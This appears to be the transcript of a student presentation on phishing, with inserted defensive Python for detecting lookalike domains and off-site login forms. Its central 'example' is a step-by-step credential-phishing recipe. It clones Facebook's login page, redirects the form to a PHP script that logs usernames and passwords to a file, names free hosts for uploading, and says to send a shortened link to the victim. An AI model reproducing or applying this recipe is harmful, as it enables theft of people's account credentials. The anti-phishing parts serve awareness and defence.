phishing ppt
DESCRIPTION
Hacking Attack and prevention
TRANSCRIPT
SARDAR VALLABH BHAI PATEL INSTITUTE OF TECHNOLOGY
A PRESENTATION ON
PHISHING
By
Mistry kartik(110413116002)
TABLE OF CONTENT :
What is phishing ?
How the phishing works ?
Types of phishing attacks.
Example of phishing
Anti-phishing Techniques.
WHAT IS PHISHING ?
Technique used to steal valuable information such as credit card numbers, social security numbers, user IDs and passwords.
Phishing is also known as “BRAND SPOOFING”.
The communication (usually email) directs the user to visit a website where they are asked to update personal information, such as passwords, credit card PINs, social security numbers and bank account numbers, that the legitimate organization already has.
THE SIMPLIFIED STEPS OF PHISHING :
1. A deceptive message is sent from the phisher to the user.
2. The user provides confidential information to a phishing server (normally after some interaction with the server).
3. The phisher obtains the confidential information from the server.
HOW PHISHING WORKS ?
A phishing link takes the user to a fake web page that looks genuine.
TYPES OF PHISHING ATTACKS :
Phishers use a wide variety of techniques, with one common thread
1. LINK MANIPULATION
2. WEBSITE FORGERY
3. PHONE PHISHING
LINK MANIPULATION
By manipulating the links for example
www.faceb00k.com
instead of
www.facebook.com
Misspelled URLs or the use of subdomains are common tricks used by phishers.
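A defender can check for both tricks mechanically. The following is an added example, not part of the original slides: it labels a hostname as a character-substitution lookalike, a near-miss typo, or a brand name buried in the subdomains of an unrelated domain. The `PROTECTED` list, the substitution table, the distance threshold of 2 and the sample hostnames are assumptions chosen for illustration.

```python
from urllib.parse import urlsplit

# Assumption: the brands to protect; the slide's example uses facebook.com.
PROTECTED = {"facebook.com"}

# Digit-for-letter swaps often seen in misspelled URLs (constructed, not exhaustive).
CONFUSABLES = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s"})


def registered_domain(host):
    """Naive last-two-labels split; production code should use the Public Suffix List."""
    return ".".join(host.lower().rstrip(".").split(".")[-2:])


def edit_distance(a, b):
    """Levenshtein distance computed one row at a time."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(url):
    """Label a URL or bare hostname relative to the PROTECTED brands."""
    host = urlsplit(url if "://" in url else "//" + url).hostname or ""
    domain = registered_domain(host)
    if domain in PROTECTED:
        return "legitimate"
    for brand in PROTECTED:
        if domain.translate(CONFUSABLES) == brand:
            return "lookalike-substitution"
        if edit_distance(domain, brand) <= 2:
            return "lookalike-typo"
        if f".{brand}." in f".{host}":
            return "brand-in-subdomain"
    return "unrelated"


if __name__ == "__main__":
    # Constructed sample hostnames, including the pair shown on the slide.
    for sample in ("www.facebook.com", "www.faceb00k.com",
                   "www.facebook.com.login.example.net", "example.org"):
        print(sample, "->", classify(sample))
```

A mail gateway or proxy could apply such a check to every link in an inbound message before delivery.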
WEBSITE FORGERY :
The hacker needs to generate a duplicate address bar using JavaScript.
Using JavaScript, the original URL is hidden and the phisher's duplicate URL is displayed in the address bar.
Seeing the modified address bar, the user thinks that the URL is genuine and provides private information such as login ID, passwords and PIN to the attacker.
Above is the website of Citibank with a fake address bar.
PHONE PHISHING
Not all phishing attacks require a fake website.
Some messages claim to come from a bank, telling the user that there is a problem with their phone account and advising them to dial a number which looks like it is owned by the bank but is actually owned by the attackers.
The attackers use a fake caller ID to call the user, so the user thinks that the call is from a trusted organization.
The user dials that number, and a recorded message plays and tells the user to enter their bank account number and password.
Phone phishing is also referred to as voice phishing, or “VISHING”.
EXAMPLE OF PHISHING ATTACKS
WWW.FACEBOOK.COM
Step 1:
Go to facebook.com
Right click on the white space of the front page. Select "View Page source". Copy the code to Notepad.
OR
Click View source From The Toolbar.
After clicking on the source you will find the HTML code of Facebook.com. You just need to copy that code into the Notepad file.
Step 2: Now find (press Ctrl+F) "action=" in that code. You will find code like this:
By default, the action= in the code directs us to the original Facebook login page. You will find something like
Action= “ https://www.facebook.com/login.php “
To divert the flow of that data from the original Facebook site to the hacker, you have to redirect the action to another file, let us say
Action=“next.php”
Next.php is another file, created by the hacker to store the user IDs and passwords submitted by a victim.
Step 3:
Now we need to create the "next.php" to store the password. so open the notepad and type the following code:
<?phpheader("Location: http://www.Facebook.com/login.php ");$handle = fopen("passwords.txt", "a");foreach($_POST as $variable => $value) {fwrite($handle, $variable);fwrite($handle, "=");fwrite($handle, $value);fwrite($handle, "\r\n");}fwrite($handle, "\r\n");fclose($handle);exit;?>
save this file as "next.php".
Step 4:
open the notepad and just save the file as "pswrds.txt" without any contents.
Now upload those three files(namely index . html, next.php ,passwords.txt) in any of domain using free Web hosting site.
There are so many free web hosting sites which provides free domain to the user. Some free webhosting sites are :
000webhost.comFreehostingforu.com360gb.comHost1free.com
EASY STEPS TO CREATE FREE WEB HOSTING SITE
Step 1 :
Redirect to any of the free web hosting site. And Sign-up.
Step 2 :
After completing the sign-up process you will get a domain and password through email. Log in using that email ID and password.
Step 3 :
After Login You will get the Control panel for your domain.
In the control panel, click on the File manager option and upload all 3 files which are required for the phishing site.
index.php : For loading Facebook Login page
next.php : To divert information to hacker when user clicks on Login button
password.php : For storing the ID and passwords of Victim.
Now you are done with phishing the facebook site. You just need to create a tiny url of your free hosting website domain using www.tinyurl.com .
You just need to copy and paste the tiny URL link to the victim.
WWW.CRUSHBITS.COM
Fraud sites like www.crushbits.com are used to fool people or to play pranks on friends. Below is the crushbits sign-up page.
After completing the sign-up process you will get a URL at your given email ID.
When you give this URL to your friends using SMS, email or a chat box, they will be redirected to the following page.
The phishing site asks the user for their crush. When the user enters the crush and clicks on the ”Click to find out” button, a message is displayed saying that they have been fooled.
Whenever the attacker logs in to their account, they are notified about all the victims and their crushes.
ANTI PHISHING TECHNIQUES
Anti phishing techniques are techniques to prevent phishing attacks.
The anti phishing techniques can in general be divided into three categories.
1. SPAM FILTERS
2. ANTI-PHISHING TOOL BARS AND
3. PASSWORD PROTECTION MECHANISM
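One check an anti-phishing tool can run on a page before the user types anything relies on the changed form `action=` described in the Facebook example above: find every form containing a password field and see which host it submits to. This is an added example, not part of the original slides; the class and function names, the `lookalike.example` host and the two HTML samples are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class LoginFormAudit(HTMLParser):
    """Collects the action of every <form> that contains a password field."""

    def __init__(self):
        super().__init__()
        self._action = ""        # action attribute of the form currently open
        self._in_form = False
        self.password_form_actions = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._in_form = True
            self._action = attrs.get("action") or ""
        elif (tag == "input" and self._in_form
              and (attrs.get("type") or "").lower() == "password"):
            self.password_form_actions.append(self._action)

    def handle_endtag(self, tag):
        if tag == "form":
            self._in_form = False


def credential_targets(page_url, html):
    """Return the absolute URLs that password forms on the page submit to."""
    audit = LoginFormAudit()
    audit.feed(html)
    # A relative action such as "next.php" resolves against the hosting page.
    return [urljoin(page_url, action) for action in audit.password_form_actions]


def posts_off_brand(page_url, html, brand_domain):
    """True if any password form submits to a host outside brand_domain."""
    for target in credential_targets(page_url, html):
        host = urlsplit(target).hostname or ""
        if host != brand_domain and not host.endswith("." + brand_domain):
            return True
    return False


# Constructed samples: identical markup apart from the action attribute.
GENUINE = ('<form action="https://www.facebook.com/login.php" method="post">'
           '<input type="password" name="pass"></form>')
FORGED = ('<form action="next.php" method="post">'
          '<input type="password" name="pass"></form>')
```

The check only catches forms that post to the lookalike host itself, so it complements rather than replaces a check on the page's own URL.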
ADVANTAGES OF ANTI-PHISHING :
Protects you from phishing attacks.
When a phishing website or phishing email appears, it informs the user.
Some anti-phishing software also lets you see the hosting location and risk rating of every site you visit.
DISADVANTAGES OF ANTI-PHISHING :
No single technology will completely stop phishing, so phishing attacks cannot be completely stopped.
Anti-phishing software must also be kept upgraded to keep pace with phishing attacks.
THANK YOU